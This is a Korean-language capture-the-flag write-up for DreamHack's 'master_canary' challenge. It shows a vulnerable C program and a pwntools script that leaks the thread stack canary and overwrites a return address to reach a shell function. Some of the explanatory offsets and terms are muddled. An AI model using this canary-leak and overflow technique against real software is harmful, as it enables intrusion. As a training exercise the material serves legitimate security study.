[DreamHack System Hacking] master_canary

문제 코드는 다음과 같다.

 

// gcc -o master master.c -pthread
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <pthread.h>

char *global_buffer;

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

void get_shell() {
    system("/bin/sh");
}

void *thread_routine() {
    char buf[256];

    global_buffer = buf;

}
void read_bytes(char *buf, size_t size) {
    size_t sz = 0;
    size_t idx = 0;
    size_t tmp;

    while (sz < size) {
        tmp = read(0, &buf[idx], 1);
        if (tmp != 1) {
            exit(-1);
        }
        idx += 1;
        sz += 1;
    }
    return;
}
int main(int argc, char *argv[]) {
    size_t size;
    pthread_t thread_t;
    size_t idx;
    char leave_comment[32];


    initialize();

    while(1) {
        printf("1. Create thread\n");
        printf("2. Input\n");
        printf("3. Exit\n");
        printf("> ");
        scanf("%d", &idx);

        switch(idx) {
            case 1:
                if (pthread_create(&thread_t, NULL, thread_routine, NULL) < 0)
                {
                    perror("thread create error");
                    exit(0);
                }
                break;
            case 2:
                printf("Size: ");
                scanf("%d", &size);

                printf("Data: ");
                read_bytes(global_buffer, size);

                printf("Data: %s", global_buffer);
                break;
            case 3:
                printf("Leave comment: ");
                read(0, leave_comment, 1024);
                return 0;
            default:
                printf("Nope\n");
                break;
        }
    }
    

    return 0;
}

 

 

checksec로 보안 기법을 확인해주었다.

 

 

 

 

read_bytes 함수에서 read 함수가 있기 때문에 이를 사용해서 buf의 크기인 256보다 많이 입력받으면 스택 오버플로우를 발생시킬 수 있을 것이다.

void read_bytes(char *buf, size_t size) {
    size_t sz = 0;
    size_t idx = 0;
    size_t tmp;

    while (sz < size) {
        tmp = read(0, &buf[idx], 1);
        if (tmp != 1) {
            exit(-1);
        }
        idx += 1;
        sz += 1;
    }
    return;
}

global_buffer이 0x110에 위치한 걸 알 수 있다.

disass main

read함수는 rbp-0x30에 위치한 걸 알 수 있다.

이를 사용해서 스택 버퍼 주소와 카나리의 주소를 알아내보자.

카나리의 주소는 0xbc5b030b71854e00이라고 구해졌고, read 함수와 스택 버퍼 주소의 간격은 0x42cfb5만큼 떨어져 있는 걸 확인했다.

 

 

익스플로잇 코드는 다음과 같이 작성했다.

from pwn import *

p = remote("host3.dreamhack.games",21211)
elf = ELF('./master_canary')
get_shell = elf.symbols['get_shell']

p.sendlineafter('> ', '1')
p.sendlineafter('> ', '2')
size = 0x8e9
p.sendlineafter('Size: ', str(size))
p.sendafter('Data: ', "A" * size)
p.recvuntil("A" * size)
canary = u64(p.recvn(7).rjust(8, b'\x00'))

payload = b"A" * 0x28
payload += p64(canary)
payload += b"A" * 8
payload += p64(get_shell)

p.sendlineafter('> ','3')
p.sendafter('Leave comment: ',payload)

p.interactive()